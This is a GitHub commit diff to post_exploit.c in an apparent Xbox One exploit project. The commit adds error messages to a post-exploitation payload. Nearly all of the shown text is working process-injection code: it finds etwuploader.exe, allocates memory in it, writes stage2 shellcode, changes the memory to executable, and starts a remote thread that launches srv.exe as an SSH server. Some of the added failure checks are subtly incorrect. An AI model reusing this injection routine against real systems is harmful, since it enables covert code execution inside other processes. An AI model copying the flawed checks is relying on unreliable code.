Skip to content

Commit aaedf1c

Browse files
carrot-c4k3carrot-c4k3
authored
Merge pull request #21 from xboxoneresearch/feat/post_exploit_errorhandling
feat: increase error details in post_exploit stage
2 parents 4b89a33 + 6d3a735 commit aaedf1c

File tree

1 file changed

+77
-16
lines changed

1 file changed

+77
-16
lines changed

collat_payload/post_exploit.c

Lines changed: 77 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -65,9 +65,9 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
6565

6666
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
6767
{
68-
sprintf(cur_msg, "EnumProcessesFailed\n");
68+
sprintf(cur_msg, "EnumProcessesFailed, error: 0x%x\n", GetLastError());
6969
send(sock, cur_msg, strlen(cur_msg), 0);
70-
return 1;
70+
exit(0);
7171
}
7272

7373

@@ -99,11 +99,11 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
9999
sizeof(szProcessName) / sizeof(CHAR));
100100
}
101101

102-
sprintf(cur_msg, "Process: %s\n", szProcessName);
103-
send(sock, cur_msg, strlen(cur_msg), 0);
102+
//sprintf(cur_msg, "Process: %s\n", szProcessName);
103+
//send(sock, cur_msg, strlen(cur_msg), 0);
104104

105105
if (strcmp(szProcessName, "etwuploader.exe") == 0) {
106-
sprintf(cur_msg, "Found etwuploader.exe\n");
106+
sprintf(cur_msg, "Found etwuploader.exe (PID: %u, HANDLE: %p)\n", pid, hProcess);
107107
send(sock, cur_msg, strlen(cur_msg), 0);
108108

109109
target_process = hProcess;
@@ -130,20 +130,39 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
130130

131131
HANDLE filehandle = CreateFileA(stage2_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
132132
if (filehandle == INVALID_HANDLE_VALUE) {
133-
sprintf(cur_msg, "Failed to load stage2\n");
133+
sprintf(cur_msg, "Failed to load stage2, error: 0x%x\n", GetLastError());
134134
send(sock, cur_msg, strlen(cur_msg), 0);
135135
exit(0);
136-
return;
137136
}
138137

139138
DWORD file_size = GetFileSize(filehandle, NULL);
139+
if (file_size <= 0) {
140+
sprintf(cur_msg, "GetFileSize failed, error: 0x%x\n", GetLastError());
141+
send(sock, cur_msg, strlen(cur_msg), 0);
142+
}
140143

141-
sprintf(cur_msg, "Allocating memory for the shellcode in the remote process\n");
144+
sprintf(cur_msg, "Allocating memory (%u bytes) for the shellcode in the remote process\n", file_size);
142145
send(sock, cur_msg, strlen(cur_msg), 0);
143146

144147
LPVOID shellcode_addr = VirtualAllocEx(target_process, 0, file_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
148+
if (shellcode_addr == NULL) {
149+
sprintf(cur_msg, "Failed to allocate memory for shellcode in remote process, error: 0x%x\n", GetLastError());
150+
send(sock, cur_msg, strlen(cur_msg), 0);
151+
exit(0);
152+
}
145153
HANDLE h_heap = GetProcessHeap();
154+
if (h_heap == INVALID_HANDLE_VALUE || h_heap == NULL) {
155+
sprintf(cur_msg, "Failed to get process heap, error: 0x%x\n", GetLastError());
156+
send(sock, cur_msg, strlen(cur_msg), 0);
157+
exit(0);
158+
}
146159
BYTE* shellcode_data = HeapAlloc(h_heap, 0, file_size);
160+
if (shellcode_data == INVALID_HANDLE_VALUE || shellcode_data == NULL) {
161+
sprintf(cur_msg, "Failed to heap allocate, error: 0x%x\n", GetLastError());
162+
send(sock, cur_msg, strlen(cur_msg), 0);
163+
exit(0);
164+
}
165+
147166

148167
DWORD remaining = file_size;
149168
DWORD bytes_read = 0;
@@ -157,37 +176,79 @@ void post_exploit_spawn_ssh_server(SOCKET sock) {
157176

158177
sprintf(cur_msg, "Writing shellcode\n");
159178
send(sock, cur_msg, strlen(cur_msg), 0);
160-
WriteProcessMemory(target_process, shellcode_addr, shellcode_data, file_size, NULL);
179+
BOOL bSuccess = WriteProcessMemory(target_process, shellcode_addr, shellcode_data, file_size, NULL);
180+
if (!bSuccess) {
181+
sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
182+
send(sock, cur_msg, strlen(cur_msg), 0);
183+
exit(0);
184+
}
161185

162186
sprintf(cur_msg, "VirtualProtecting shellcode\n");
163187
send(sock, cur_msg, strlen(cur_msg), 0);
164188
DWORD old_protection = 0;
165-
VirtualProtectEx(target_process, shellcode_addr, file_size, PAGE_EXECUTE_READ, &old_protection);
189+
bSuccess = VirtualProtectEx(target_process, shellcode_addr, file_size, PAGE_EXECUTE_READ, &old_protection);
190+
if (!bSuccess) {
191+
sprintf(cur_msg, "Failed VirtualProtect, error: 0x%x\n", GetLastError());
192+
send(sock, cur_msg, strlen(cur_msg), 0);
193+
exit(0);
194+
}
166195

196+
char srv_name[0x200] = { 0 };
197+
DWORD result = ExpandEnvironmentStringsA("%LOCALAPPDATA%\\..\\LocalState\\srv.exe", srv_name, sizeof(srv_name));
198+
if (result == 0) {
199+
sprintf(cur_msg, "Failed ExpandEnvironmentStringsA, error: 0x%x\n", GetLastError());
200+
send(sock, cur_msg, strlen(cur_msg), 0);
201+
exit(0);
202+
}
167203

168-
sprintf(cur_msg, "Creating remote thread\n");
169-
send(sock, cur_msg, strlen(cur_msg), 0);
170204

171-
char srv_name[0x200] = { 0 };
172-
ExpandEnvironmentStringsA("%LOCALAPPDATA%\\..\\LocalState\\srv.exe", srv_name, sizeof(srv_name));
173205
sprintf(cur_msg, "New process to be started: %s\n", srv_name);
174206
send(sock, cur_msg, strlen(cur_msg), 0);
175207

176208
LPVOID image_name = VirtualAllocEx(target_process, 0, sizeof(srv_name), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
177-
WriteProcessMemory(target_process, image_name, srv_name, sizeof(srv_name), NULL);
209+
if (image_name == NULL) {
210+
sprintf(cur_msg, "Failed VirtualAllocEx, error: 0x%x\n", GetLastError());
211+
send(sock, cur_msg, strlen(cur_msg), 0);
212+
exit(0);
213+
}
214+
215+
bSuccess = WriteProcessMemory(target_process, image_name, srv_name, sizeof(srv_name), NULL);
216+
if (!bSuccess) {
217+
sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
218+
send(sock, cur_msg, strlen(cur_msg), 0);
219+
exit(0);
220+
}
178221

179222
SHELLCODE_ARGS args = {
180223
image_name,
181224
NULL,
182225
};
183226

184227
LPVOID args_addr = VirtualAllocEx(target_process, 0, sizeof(args), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
228+
if (args_addr == NULL) {
229+
sprintf(cur_msg, "Failed VirtualAllocEx, error: 0x%x\n", GetLastError());
230+
send(sock, cur_msg, strlen(cur_msg), 0);
231+
exit(0);
232+
}
185233
sprintf(cur_msg, "Args will be allocated at: %p\n", args_addr);
186234
send(sock, cur_msg, strlen(cur_msg), 0);
187235

188-
WriteProcessMemory(target_process, args_addr, &args, sizeof(args), NULL);
236+
bSuccess = WriteProcessMemory(target_process, args_addr, &args, sizeof(args), NULL);
237+
if (!bSuccess) {
238+
sprintf(cur_msg, "Failed WriteProcessMemory, error: 0x%x\n", GetLastError());
239+
send(sock, cur_msg, strlen(cur_msg), 0);
240+
exit(0);
241+
}
242+
243+
sprintf(cur_msg, "Creating remote thread\n");
244+
send(sock, cur_msg, strlen(cur_msg), 0);
189245

190246
HANDLE thread_handle = CreateRemoteThread(target_process, NULL, 0, shellcode_addr, args_addr, 0, NULL);
247+
if (thread_handle == INVALID_HANDLE_VALUE) {
248+
sprintf(cur_msg, "Failed CreateRemoteThread, error: 0x%x\n", GetLastError());
249+
send(sock, cur_msg, strlen(cur_msg), 0);
250+
exit(0);
251+
}
191252
//ResumeThread(thread_handle);
192253
sprintf(cur_msg, "Remote thread HANDLE: %p\n", thread_handle);
193254
send(sock, cur_msg, strlen(cur_msg), 0);

0 commit comments

Comments
 (0)